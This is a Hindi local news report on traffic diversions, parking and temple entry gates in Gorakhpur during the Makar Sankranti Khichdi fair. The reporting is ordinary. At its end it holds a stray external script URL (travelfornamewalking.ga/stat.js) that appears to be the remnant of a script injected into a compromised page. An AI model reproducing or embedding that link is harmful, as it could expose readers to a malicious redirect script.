गोरखपुर,( कुलसूम फात्मा )  गोरखपुर में मकर संक्रांति तथा खिचड़ी मेले के कारण बुधवार से यातायात व्यवस्था में बदलाव कर दिए गए हैं।मंदिर की तरफ चार पहिया वाहनों को जाने पर रोक लगा दी गई है। यह यातायात व्यवस्था में बदलाव जनवरी की 15 तारीख की रात तक के लागू रहेगा।

 

 

डीआईजी एसएसपी जोगेंद्र कुमार से जब बातचीत की तो उन्होंने बताया कि क्योंकि मकर संक्रांति तथा खिचड़ी मेले को लेकर के शहर में यातायात व्यवस्था में सुधार करना बहुत आवश्यक था। इस कारण 13 जनवरी बुधवार से 3 दिन तक यातायात व्यवस्था में परिवर्तन किए गए हैं। इसमें गोरखपुर मंदिर की तरफ चार पहिया वाहन को जाने से रोका गया है और खिचड़ी मेले को ध्यान में रखते हुए रूट डायवर्जन भी किया गया है। यह परिवर्तन 15 जनवरी की रात 10:00 बजे तक के लागू रहेगा। उसके बाद पूर्व की तरह यातायात व्यवस्था चलेगी।   उन्होंने बताया की एंबुलेंस वीआईपी तथा पास धारक गाड़ियों को छूट दी गई है। स्थानीय लोगों को निवास प्रमाण पत्र के साथ गाड़ीयों को पास करने की अनुमति दी जाएगी।

 

 

 

जाने कौन से रास्ते खुले रहेंगे और कौन से बंद ?

 

 

  • बता दे की सोनौली जाने वाले वाहन ट्रैफिक ऑफिस की ओर से होते हुए धर्मशाला जाएंगे तथा गंगे दुर्गाबाड़ी और सूरजकुंड ओवरब्रिज तथा ग्रीन सिटी होते हुए जाएंगे और सुनोली की तरफ से आने वाले वाहन बरगदवां से खजांची की ओर से मुड़ कर के जाएंगे। और वह लोग जिनको बरगदवां से गोरखनाथ मंदिर नहीं जाना है, वह औद्योगिक संस्थान से मुड़ कर रामनगर चौराहा से नकहा ओवरब्रिज होते हुए खजांची की ओर जाएंगे। गोरखपुर से पीपीगंज फरेंदा सोनौली की तरफ जाने वाले भारी वाहन राज्यकीय गाड़ियां छात्रसंघ चौराहा, मोहद्दीपुर की तरफ से चारफाटकर होते हुए जेल बाईपास, पादरीबाजार, फातिमा, खजांची, स्पोर्ट कॉलेज तथा घोषीपुरवा नकहा होते हुए बरगदवां चौकी के सामने से जाएंगे।   और फरेंदा पीपीगंज की तरफ से आने वाले वाहनों के बारे में यदि बात करें तो इसी रास्ते से वह होकर गुजरेंगे तथा बरगदवां आवास विकास कॉलोनी इंडस्ट्रियल क्षेत्र की ओर से जाने वाले जो वाहन छोटे होते हैं जैसे साइकिल ये कौडीहवा के समीप सड़क को छोड़कर कौडीहवा मोड़ से मुड़ेंगेंऔर गोरखनाथ मंदिर पश्चिम मार्ग से होते हुए सूरज कुंड रेलवे क्रॉसिंग की तरफ उनको भेजा जाएगा।

 

 

जाने गोरखपुर से महाराजगंज पिपराइच रोड का डायवर्सन।

 

 

  • बता दें की गोरखपुर से महाराजगंज पिपराइच मार्ग की तरफ से जाने वाली गाड़ियां सी एस चौराहा से होते हुए महदीपुर चारफाटक जेल बाईपास पादरी मार्केट होते हुए पिपराइच की ओर जाएंगी और फातिमा हॉस्पिटल खजांची होते हुए महाराजगंज को जाएंगे।

 

 

दुर्गाबाड़ी तिराहा का डायवर्जन।

 

  • और दुर्गा बाड़ी तिराहा से गोरखनाथ ओवर ब्रिज के नीचे रेलवेक्राङ्क्षसग से उत्तर गोरखनाथ मंदिर की तरफ किसी भी तरह के वाहन नहीं जा सकेंगे। हिमांयूपुर रेलवे क्राङ्क्षसग के उत्तर पश्चिम गोरखनाथ मंदिर की तरफ से कोई भी वाहन रिक्शा नहीं जाएंगे इनपर रोक लगाई जाएगी। रामलीला मैदान से ङ्क्षसधी गली  गली से गोरखनाथ मंदिर की तरफ वाहन तथा रिक्शा नहीं जाएंगे। और रसूलपुर तिराहा से मंदिर की तरफ दशहरी बाग से मंदिर की ओर तथा कौड़िहवा मोड़ से मंदिर की तरफ जाहिदाबार तिराहा से मंदिर की तरफ बरगदवां से श्रद्धालुओं को वाहन छोड़कर के बाकी कोई को मंदिर की तरफ नहीं जाने दिया जाएगा।

 

जाने वाहन पार्किंग के संबंध में।

  • उत्तर प्रदेश की राजधानी लखनऊ, तथा वाराणसी और देवरिया और कुशीनगर से आने वाले श्रद्धालुओं को
    यातायात कार्यालय होकर के गोरखनाथ मंदिर जाना होगा तथा उनके बड़े वाहन जो होंगे जैसे के बस ट्रैक्टर ट्रॉली भगवती महिला महाविद्यालय में तथा चार पहिया बाइक को आरपीएफ ग्राउंड में खड़ा किया जाएगा।

 

  • और सोनोली फरेंदा की तरफ से आने वाले श्रद्धालु बरगदवां से होते हुए गोरखनाथ मंदिर जाएंगे तथा इनके बड़े जो वाहन हैं उनको कुष्ठ आश्रम तथा स्प्रिंग मोड़ मार्ग के दोनों ओर चार पहिया तथा बाइक को औद्योगिक केंद्र में खड़ा कराया जाएगा।

 

  • इसके साथ ही महाराजगंज, पिपराइच की तरफ से आने वाले दर्शनार्थी खजांची, चौराहा तथा फ़र्टिलाइज़र से नकहा होते हुए आएंगे और उनके वाहन को राम नगर चौराहे से दाहिने शंकर के कुष्ठ आश्रम एवं स्प्रिंग मोड़ रोड के दोनों और पाक कराया जाएगा। इसी तरीके से चार पहिया और बाइक को भी औद्योगिक केंद्र में ही पार्क करना होगा।

 

जाने कहां से होगी श्रद्धालुओं की इंट्री

  • श्रद्धालुओं की इंट्री धर्मशाला चौराहे से तरंग ओवरब्रिज होते हुए गोरखनाथ मंदिर आने वाले श्रद्धालुओं को गेट नंबर 2 तथा बरगदवां के तरफ से आने वाले लोग को गेट नंबर 3 से इंट्री करनी होगी। दर्शन के पश्चात गेट नंबर चार तथा गेट नंबर 1 से इनको बाहर निकलना होगा

https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.